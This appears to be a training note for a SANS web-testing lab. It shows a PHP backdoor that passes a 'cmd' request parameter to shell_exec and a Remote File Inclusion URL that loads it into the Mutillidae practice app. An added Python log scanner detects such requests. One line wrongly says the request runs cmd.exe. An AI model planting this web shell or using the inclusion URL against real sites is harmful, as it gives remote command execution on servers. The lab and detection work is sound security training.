In SANS SEC542, we use a backdoor PHP shell. The exercise uses RFI to include a text copy of the PHP code into Mutillidae. Here is how you can 'enhance it'.
Write to a webhost:
nano /var/www/html/id.txt
Inside of id.txt we have some helper functions to debug:
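<?php
echo "<pre>";
echo "This is the symbol table:";
// Dump every request parameter the included script can see.
// var_dump() prints directly and returns nothing, so no echo is needed.
var_dump($_REQUEST);
echo "Commands:";
// Run the value of the cmd parameter and print its output.
echo shell_exec($_REQUEST['cmd']);
echo "</pre>";
?>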
If you copy this into a txt file you can then request the following URL:
http://multillidae/index.php?page=http://127.0.0.1/id.txt&cmd=ls
This would result in running cmd.exe. Note that http://127.0.0.1 is used because we are hosting the file on our local host, which is also our own target.
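
A defender-side check for the request shown above, as an added example that is not part of the original gist: it scans access-log lines for any query parameter whose decoded value is a remote URL and reports which other parameters rode along. The common/combined log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that *starts* with a remote scheme, as in page=http://...
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)


def find_rfi_candidates(log_lines):
    """Return (line_no, client, param, value, other_params) per suspicious parameter."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split()[0]
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes, so page=http%3A%2F%2F... is seen as http://...
        pairs = parse_qsl(query, keep_blank_values=True)
        for param, value in pairs:
            if REMOTE_VALUE_RE.match(value):
                # The included script reads $_REQUEST, so the remaining
                # parameters (e.g. cmd) are worth recording for triage.
                others = [p for p, _ in pairs if p != param]
                hits.append((line_no, client, param, value, others))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jan/2018:17:00:01 +0000] "GET /index.php?page=home.php HTTP/1.1" 200 5120',
    '10.0.0.5 - - [28/Jan/2018:17:00:09 +0000] "GET /index.php?page=http://127.0.0.1/id.txt&cmd=ls HTTP/1.1" 200 734',
    '10.0.0.7 - - [28/Jan/2018:17:00:15 +0000] "GET /index.php?page=http%3A%2F%2F127.0.0.1%2Fid.txt&cmd=id HTTP/1.1" 200 702',
    '10.0.0.9 - - [28/Jan/2018:17:01:02 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, client, param, value, others in find_rfi_candidates(SAMPLE_LOG):
        print(f"line {line_no}: {client} sent {param}={value!r} (other params: {others})")
```

On the server side, PHP's include() only fetches such a URL when allow_url_include is enabled, so keeping that setting Off removes the remote case.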